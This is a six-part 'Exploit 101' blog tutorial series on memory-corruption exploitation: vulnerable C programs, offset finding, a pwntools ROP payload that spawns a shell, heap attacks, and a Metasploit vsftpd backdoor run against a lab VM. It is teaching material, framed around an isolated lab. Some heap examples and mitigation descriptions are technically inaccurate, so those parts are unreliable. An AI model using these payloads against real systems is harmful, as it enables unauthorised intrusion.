Monday, March 3, 2025

Exploit 101: Part 6 - Advanced Heap Exploitation


In this sixth part of our Exploit 101 series, we dive deeper into Advanced Heap Exploitation, covering heap metadata corruption, fastbin attacks, unlink exploitation, and other modern heap exploitation techniques.

Understanding the Heap Allocator

Most Linux systems use glibc's ptmalloc2 as the heap allocator. Understanding its structure is key to exploiting heap vulnerabilities.

Heap Chunk Structure (ptmalloc2)

A heap chunk consists of the following fields:

+--------------------+
| Prev Size         |  (If previous chunk is free)
+--------------------+
| Size             |  (Size of this chunk + metadata flags)
+--------------------+
| User Data        |  (Allocated memory returned to malloc caller)
+--------------------+
| Padding          |  (Aligns chunk size to 8/16 bytes)
+--------------------+
| Next Chunk Size  |  (Size of next chunk if it's free)
+--------------------+

Key Heap Attack Techniques

  • Fastbin Duplication Attack – Abusing fastbins to allocate memory at arbitrary locations.
  • Unlink Exploitation – Manipulating free chunk pointers to overwrite critical data.
  • House of Force – Expanding the top chunk to overwrite memory regions.
  • House of Spirit – Allocating fake chunks to bypass protections.
  • House of Corrosion – Attacking heap metadata corruption.

Exploit 1: Fastbin Duplication Attack

Vulnerable C Code

#include <stdio.h>
#include <stdlib.h>
int main() {
    char *a = malloc(64);
    char *b = malloc(64);
    free(a);
    free(b);
    char *c = malloc(64);  // Reuses the same chunk
    strcpy(c, "Exploited!");
    printf("%s\n", c);
    return 0;
}

Exploiting Fastbin Duplication

  1. Run the binary under GDB:
    gdb -q ./fastbin_exploit
    
  2. Set breakpoints after free() to inspect heap:
    heap bins
    
  3. Corrupt the fastbin list to allocate memory at an arbitrary address.

Exploit 2: Unlink Exploitation

Vulnerable C Code

#include <stdio.h>
#include <stdlib.h>
struct Chunk {
    struct Chunk *fd;
    struct Chunk *bk;
};
int main() {
    struct Chunk *a = malloc(sizeof(struct Chunk));
    struct Chunk *b = malloc(sizeof(struct Chunk));
    free(a);
    free(b);
    a->fd = (struct Chunk*)&a - 2;
    a->bk = (struct Chunk*)&a - 1;
    malloc(sizeof(struct Chunk));
    return 0;
}

Exploiting Unlink Attack

When malloc() reuses freed memory, unlink() writes to an arbitrary address, leading to control of program execution.

Heap Exploitation Mitigations

Modern Linux systems implement heap protections:

  • Safe Linking – Protects against fastbin corruption.
  • Heap Canaries – Detects overflows before they corrupt metadata.
  • tcache (Thread Cache) – Prevents simple fastbin abuse.
  • ASLR (Address Space Layout Randomization) – Makes address prediction difficult.

Bypassing Protections

  • Heap Spraying – Flooding memory with controlled data to predict allocation.
  • Leaking Heap Addresses – Using format string vulnerabilities or memory leaks.
  • Brute Forcing – Attempting multiple allocations to find predictable heap structures.

Conclusion

Advanced heap exploitation requires deep knowledge of heap internals, allocator behavior, and bypassing modern mitigations. In the next part, we will cover Kernel Exploitation Techniques.

Stay tuned for Exploit 101: Part 7 – Kernel Exploitation Basics!

Sunday, March 2, 2025

Exploit 101: Part 5 - Heap Exploitation Basics


In the fifth part of our Exploit 101 series, we will explore heap exploitation, a technique used to manipulate memory allocation mechanisms to gain control over a program's execution.

What is Heap Exploitation?

The heap is a memory region used for dynamic allocation, where programs request memory at runtime using functions like malloc(), calloc(), and realloc(). Unlike stack-based buffer overflows, heap exploitation targets vulnerabilities in heap management to overwrite critical data structures and gain arbitrary code execution.

Common Heap Vulnerabilities

  1. Heap Buffer Overflow – Writing beyond allocated memory on the heap.
  2. Use-After-Free (UAF) – Accessing freed memory, leading to unintended behavior.
  3. Double-Free – Freeing the same memory location twice, corrupting heap structures.
  4. Heap Spraying – Filling heap memory with controlled data to redirect execution.

Setting Up Heap Exploitation Environment

Required Tools

Ensure your system has the following tools installed:

  • GDB with GEF (GDB Enhanced Features)
    sudo apt install gdb -y
    wget -O ~/.gdbinit-gef.py https://gef.blah.cat/py
    echo "source ~/.gdbinit-gef.py" >> ~/.gdbinit
    
  • Pwntools (Python Exploit Development Library)
    pip install pwntools
    
  • Libc Debugging Symbols
    sudo apt install libc6-dbg
    

Example 1: Heap Buffer Overflow

Consider the following vulnerable C code:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void vulnerable_function(char *input) {
    char *buffer = malloc(64);
    strcpy(buffer, input);  // No bounds checking
    printf("You entered: %s\n", buffer);
    free(buffer);
}

int main(int argc, char *argv[]) {
    if (argc < 2) {
        printf("Usage: %s <input>\n", argv[0]);
        return 1;
    }
    vulnerable_function(argv[1]);
    return 0;
}

The strcpy() function does not verify input length, leading to a heap overflow.

Exploiting Heap Buffer Overflow

Compile the vulnerable program:

gcc -o heap_overflow heap_overflow.c -fno-stack-protector -z execstack -g

Trigger an overflow using python:

./heap_overflow $(python -c 'print("A" * 100)')

If the program crashes, it indicates memory corruption, which can be leveraged to overwrite function pointers or heap metadata.

Example 2: Use-After-Free (UAF) Exploit

Vulnerable C Code

#include <stdio.h>
#include <stdlib.h>

int main() {
    char *ptr = malloc(64);
    strcpy(ptr, "Sensitive Data");
    free(ptr);  // Memory freed but pointer is still accessible
    printf("Use-After-Free: %s\n", ptr);  // Accessing freed memory
    return 0;
}

This program accesses freed memory, which can be exploited by allocating controlled input at the same memory location.

Exploiting UAF

Run the program:

./uaf

If the memory is reused by another allocation, an attacker can control the program flow.

Debugging Heap Exploits with GDB

Use GDB to analyze heap behavior:

gdb -q ./heap_overflow
run $(python -c 'print("A" * 100)')
heap bins  # View heap chunk allocations

Use pwndbg to visualize heap corruption:

heap chunks

Conclusion

Heap exploitation is an advanced technique requiring a deep understanding of memory management. In the next part, we will cover Advanced Heap Exploitation Techniques.

Stay tuned for Exploit 101: Part 6 – Advanced Heap Exploitation!

Exploit 101: Part 4 - Return-Oriented Programming (ROP) Basics


In the fourth part of our Exploit 101 series, we dive into Return-Oriented Programming (ROP), a powerful exploitation technique used to bypass security mitigations like Data Execution Prevention (DEP).

What is Return-Oriented Programming (ROP)?

ROP is an advanced exploitation technique that allows an attacker to execute code without injecting shellcode directly into memory. Instead, it reuses existing code snippets (gadgets) from the binary or loaded libraries to craft a malicious payload.

Why Use ROP?

  • Bypasses DEP: Since DEP prevents execution of injected shellcode, ROP leverages legitimate executable code.
  • Avoids direct shellcode injection: Uses existing functions to achieve malicious actions.
  • Works on non-executable stacks: Helps execute system calls by chaining existing instructions.

1. Understanding ROP Gadgets

ROP gadgets are small instruction sequences that end in a ret instruction. They allow control over execution flow without injecting code.

Example ROP Gadget:

pop eax
ret

This allows the attacker to control the eax register before returning execution.

Finding ROP Gadgets

Use ROPgadget to find usable instructions in a binary:

ROPgadget --binary vuln

Example output:

0x0804849b : pop eax ; ret
0x08048542 : pop ebx ; pop ecx ; ret

These gadgets can be chained together to manipulate execution flow.

2. Setting Up a ROP Attack

Step 1: Identify a Vulnerable Function

Consider this vulnerable C program:

#include <stdio.h>
#include <string.h>
void vulnerable_function(char *input) {
    char buffer[64];
    strcpy(buffer, input);
}
int main(int argc, char *argv[]) {
    vulnerable_function(argv[1]);
    return 0;
}

It lacks bounds checking, leading to a buffer overflow.

Step 2: Find the Offset

Use a cyclic pattern to find the crash offset:

from pwn import *
pattern = cyclic(100)
print(pattern)

Run the binary with the pattern and find the overwrite location in EIP/RIP:

./vuln $(python -c 'from pwn import *; print(cyclic(100))')

Check the register in GDB:

gdb -q ./vuln
run $(python -c 'from pwn import *; print(cyclic(100))')
info registers

Find the offset using:

print(cyclic_find(0x61616162))  # Replace with actual crash value

Step 3: Build the ROP Chain

Find a useful function like system():

objdump -d vuln | grep system

If system() is available, we can call it with /bin/sh to gain a shell.

Example ROP chain in Python:

from pwn import *

binary = ELF("./vuln")
system = binary.symbols['system']
bin_sh = next(binary.search(b"/bin/sh"))

payload = b"A" * 64  # Overflow buffer
payload += p32(system)  # Call system()
payload += b"AAAA"  # Return address (not needed)
payload += p32(bin_sh)  # Argument to system()

print(payload)

Run the exploit:

./vuln $(python exploit.py)

If successful, this spawns a shell.

Conclusion

ROP is an essential technique for bypassing DEP and executing code without injecting shellcode directly. In the next part, we will cover Heap Exploitation Techniques.

Stay tuned for Exploit 101: Part 5 – Heap Exploitation Basics!

Saturday, March 1, 2025

Exploit 101: Part 3 - Introduction to Exploit Development


In the third part of our Exploit 101 series, we will explore the basics of exploit development, including understanding memory vulnerabilities, analyzing vulnerable applications, and writing simple exploits.

What is Exploit Development?

Exploit development is the process of creating scripts or code that take advantage of a vulnerability to achieve unintended behavior, such as remote code execution (RCE), privilege escalation, or denial of service (DoS).

Common Types of Exploits

  1. Stack-Based Buffer Overflow – Overwriting return addresses in the stack.
  2. Heap-Based Buffer Overflow – Corrupting memory allocated on the heap.
  3. Format String Vulnerabilities – Reading or writing arbitrary memory.
  4. Use-After-Free (UAF) – Exploiting memory that has been deallocated.
  5. Integer Overflow – Bypassing integer limitations to overwrite memory.

Setting Up Your Exploit Development Environment

Required Tools

Ensure you have the following tools installed on your attacker machine (Kali Linux, Parrot OS, or Ubuntu):

  • GDB (GNU Debugger) – Analyze and debug binaries.
    sudo apt install gdb -y
    
  • Pwntools – Python library for writing exploits.
    pip install pwntools
    
  • Radare2 – Reverse engineering and debugging framework.
    sudo apt install radare2 -y
    
  • IDA Free / Ghidra – Binary analysis tools.

Understanding Memory Exploits

1. Stack-Based Buffer Overflow (Simple Example)

A buffer overflow occurs when input exceeds a fixed buffer size, corrupting adjacent memory.

Example Vulnerable Code (C):

#include <stdio.h>
#include <string.h>
void vulnerable_function(char *input) {
    char buffer[64];
    strcpy(buffer, input);
}
int main(int argc, char *argv[]) {
    vulnerable_function(argv[1]);
    return 0;
}

This code is vulnerable because strcpy does not check buffer size.

Identifying the Overflow:

Compile with disabled protections:

gcc -fno-stack-protector -z execstack -o vuln vuln.c

Run the program with an oversized input:

./vuln $(python -c 'print("A"*100)')

If the program crashes, it means we can overwrite memory.

Writing a Simple Exploit

1. Finding the Offset

Use a pattern generator from Pwntools:

from pwn import *
pattern = cyclic(100)
print(pattern)

Run the program with this pattern and check where it crashes.

./vuln $(python -c 'from pwn import *; print(cyclic(100))')

Use GDB to find the offset:

gdb -q ./vuln
run $(python -c 'from pwn import *; print(cyclic(100))')
info registers

Look for the register (e.g., EIP or RIP) that contains a recognizable pattern and find its offset.

from pwn import *
print(cyclic_find(0x61616162))  # Replace with actual crash value

2. Overwriting the Return Address

Modify the exploit to inject shellcode.

from pwn import *

payload = b"A" * 64  # Overflow buffer
payload += b"B" * 4   # Overwrite saved EIP

print(payload)

Run it:

./vuln $(python exploit.py)

If successful, we control EIP/RIP, meaning we can redirect execution.

Conclusion

This introduction covers the basics of exploit development, including memory corruption techniques and writing simple exploits. In the next part, we will dive into Return-Oriented Programming (ROP) and Advanced Exploitation Techniques.

Stay tuned for Exploit 101: Part 4 – Return-Oriented Programming (ROP) Basics!

Exploit 101: Part 2 - Setting Up an Exploitation Lab


In the second part of our Exploit 101 series, we will cover how to set up a safe and controlled environment for vulnerability research and exploit development. An exploitation lab is essential for testing security concepts without causing unintended harm.

Why Set Up an Exploitation Lab?

A dedicated lab provides:

  • A safe environment to test exploits without damaging real systems.
  • A controlled setup to analyze vulnerabilities and develop proof-of-concepts (PoCs).
  • Hands-on experience with real-world attack techniques.

1. Choosing the Right Virtualization Software

To create an isolated testing environment, we use virtual machines (VMs):

Software Features
VirtualBox Free, open-source, easy to set up
VMware Workstation Paid but powerful with snapshot features
KVM/QEMU Linux-native virtualization for advanced users

Installing VirtualBox (Example)

On Debian/Ubuntu:

sudo apt update && sudo apt install virtualbox -y

On Arch Linux:

sudo pacman -S virtualbox

2. Selecting the Operating Systems

A good lab should include both vulnerable targets and attacker machines.

Attacker Machine (Kali Linux / Parrot OS)

  • Kali Linux (Recommended)
    wget https://cdimage.kali.org/kali-linux-rolling.iso
    
  • Parrot Security OS
    wget https://download.parrot.sh/parrot/iso/5.3/Parrot-security-5.3_x64.iso
    

Vulnerable Target Machines

VM Description
Metasploitable 2 Deliberately vulnerable Linux VM for pentesting
Windows 7 with VulnApps Test Windows exploits in a sandboxed setup
Damn Vulnerable Web App (DVWA) Web application with known vulnerabilities
Hack The Box / VulnHub VMs Real-world challenges for exploit testing

3. Configuring Network Settings

A safe network setup ensures controlled attacks:

  • Host-Only Network – Isolates VMs from the internet while allowing internal communication.
  • NAT (Network Address Translation) – VMs have internet access but are hidden from the outside world.
  • Bridged Mode – Gives VMs real IPs (use with caution!).

Setting Up a Host-Only Network in VirtualBox

  1. Open VirtualBox > File > Host Network Manager.
  2. Create a new host-only network.
  3. Assign IP range (e.g., 192.168.56.1/24).
  4. Attach target VMs to this network.

4. Installing Essential Exploitation Tools

Your attacker machine should have the following tools installed:

Metasploit Framework (Exploit Automation)

sudo apt install metasploit-framework -y
msfconsole

GDB (GNU Debugger) for Analyzing Binaries

sudo apt install gdb -y

Pwntools (Python Exploit Development)

pip install pwntools

Radare2 (Reverse Engineering)

sudo apt install radare2 -y

IDA Free / Ghidra (Disassemblers)

  • Download IDA Free from hex-rays.com
  • Install Ghidra (NSA-developed reverse engineering tool):
    wget https://ghidra-sre.org/ghidra_10.3_PUBLIC_20230509.zip
    unzip ghidra_10.3_PUBLIC_20230509.zip
    

5. Testing Your Setup

Once your environment is ready, verify:

  • Network connectivity: Can the attacker machine communicate with target VMs?
  • Exploit testing: Use Metasploit to exploit a test vulnerability.
  • Debugging tools: Ensure gdb and radare2 work correctly.

Example: Exploiting Metasploitable 2

Start Metasploit and scan the target:

msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.56.101
exploit

This should open a backdoor shell on the target VM!

Conclusion

By setting up a proper exploitation lab, you can safely research vulnerabilities and test exploits without legal or ethical concerns. In the next part, we will cover Basic Exploit Development Techniques.

Stay tuned for Exploit 101: Part 3 – Introduction to Exploit Development!

Friday, February 28, 2025

Exploit 101: Part 1 - Introduction to Exploits and Vulnerabilities

Exploits are a fundamental concept in cybersecurity, used by attackers and ethical hackers to assess system security. In this Exploit 101 series, we will cover different types of exploits, vulnerability research, and practical exploitation techniques.

What is an Exploit?

An exploit is a piece of code or a technique used to take advantage of a software, hardware, or network vulnerability. Exploits allow an attacker to execute arbitrary code, escalate privileges, or gain unauthorized access to a system.

Types of Exploits

  1. Remote Exploits – Attacks that target network-accessible vulnerabilities (e.g., remote code execution, buffer overflow in a web server).
  2. Local Exploits – Require prior access to the system to escalate privileges (e.g., kernel privilege escalation).
  3. Zero-Day Exploits – Exploits targeting unknown or unpatched vulnerabilities.
  4. Client-Side Exploits – Target end-user applications such as browsers, PDF readers, or media players.
  5. Web Exploits – Attack web applications through SQL Injection, Cross-Site Scripting (XSS), or Command Injection.

Understanding Vulnerabilities

A vulnerability is a flaw in software or hardware that can be exploited. Common types include:

  • Buffer Overflow – Occurs when a program writes data beyond allocated memory, leading to code execution.
  • Race Conditions – Exploiting time-sensitive operations to gain unintended behavior.
  • Insecure Deserialization – Manipulating serialized data to execute malicious code.
  • Command Injection – Executing system commands via improperly sanitized input.

Common Exploitation Techniques

1. Buffer Overflow

Buffer overflow exploits occur when an attacker overflows a buffer and overwrites control structures in memory. Example in C (vulnerable code):

#include <stdio.h>
#include <string.h>
void vulnerable_function(char *input) {
    char buffer[64];
    strcpy(buffer, input);
}
int main(int argc, char *argv[]) {
    vulnerable_function(argv[1]);
    return 0;
}

An attacker can overflow buffer and overwrite the return address, redirecting execution to malicious code.

2. Format String Vulnerability

Allows an attacker to read/write memory using improper format specifiers.

#include <stdio.h>
int main() {
    char input[100];
    scanf("%s", input);
    printf(input);
}

If an attacker inputs %x %x %x, it can leak memory content.

Exploit Development Tools

  • GDB – Debugging tool for analyzing binary execution.
  • Radare2 – Reverse engineering framework.
  • Pwntools – Python library for exploit development.
  • Metasploit Framework – Exploit automation and penetration testing tool.

How to Get Started with Exploit Development

  1. Learn Assembly & Reverse Engineering – Understanding x86/x64 assembly is crucial.
  2. Understand Memory Corruption – Study buffer overflows, heap exploitation, and format string bugs.
  3. Use Vulnerable Labs – Practice in environments like VulnHub, Hack The Box, and Exploit-DB.
  4. Analyze CVEs (Common Vulnerabilities and Exposures) – Study past exploits and try to recreate them.

Conclusion

This introduction provides a foundation for understanding exploits, vulnerabilities, and exploitation techniques. In the next part, we will cover setting up a lab environment for exploit development.

Stay tuned for Exploit 101: Part 2 – Setting Up an Exploitation Lab!